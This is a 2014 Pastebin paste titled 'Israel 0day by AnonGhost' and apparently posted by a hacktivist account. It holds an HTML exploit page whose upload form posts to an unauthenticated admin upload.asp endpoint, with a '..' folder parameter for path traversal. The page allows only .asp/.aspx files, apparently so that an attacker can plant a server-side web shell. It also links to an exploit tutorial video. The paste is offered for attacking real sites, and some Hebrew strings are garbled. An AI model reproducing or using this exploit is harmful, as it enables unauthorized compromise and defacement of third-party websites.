Advertisement
Black_Cracker

Israel 0day by AnonGhost

Nov 1st, 2014
1,087
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.34 KB | None | 0 0
  1. <html><head><script>
  2. var tblContentBackgroundAlternate = ""
  3. var tblContentBackground = ""
  4. </script>
  5. <script type="text/javascript" src="js/common.js"></script>
  6.  
  7.  
  8.  
  9. <script>
  10. function chkfile(){
  11. filename = document.uploadfrm.uploadFile.value.toLowerCase()
  12. fileext = filename.slice(filename.length-3,filename.length);
  13. if (((fileext != "asp")&&(fileext != "aspx")) || (filename.length <= 4)){
  14. alert("???? ????? ???? ????")
  15. return false;
  16. }
  17. document.uploadfrm.submit();
  18. }
  19. </script>
  20.  
  21.  
  22.  
  23.  
  24.  
  25. <link href="http://www.zchori.co.il/admin/styles/adminstyles.css" rel="stylesheet" type="text/css">
  26. <meta http-equiv="CONTENT-TYPE" content="TEXT/HTML; CHARSET=WINDOWS-1255">
  27. </head>
  28.  
  29. <body>
  30. <div dir="rtl">
  31. <form action="http://www.target.co.il/admin/upload.asp?folder=.." enctype="multipart/form-data" method="POST" name="uploadfrm">
  32. <table cellpadding="3" cellspacing="3" border="0" dir="rtl">
  33. <tbody><tr>
  34. <td align="right"> <input class="textbox" type="file" name="uploadFile" size="30"> </td>
  35. <td align="right"> <input type="button" class="buttonText_light" name="but_????" ??????="" style="cursor:hand;" onclick="chkfile();" value="???? ??????"> </td>
  36. </tr>
  37. </tbody></table>
  38. <input type="hidden" name="up" value="1">
  39. </form>
  40. </div>
  41.  
  42.  
  43. Exploit tutorial : https://www.youtube.com/watch?v=ILarrTOYDPA&feature=youtu.be
  44.  
  45. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement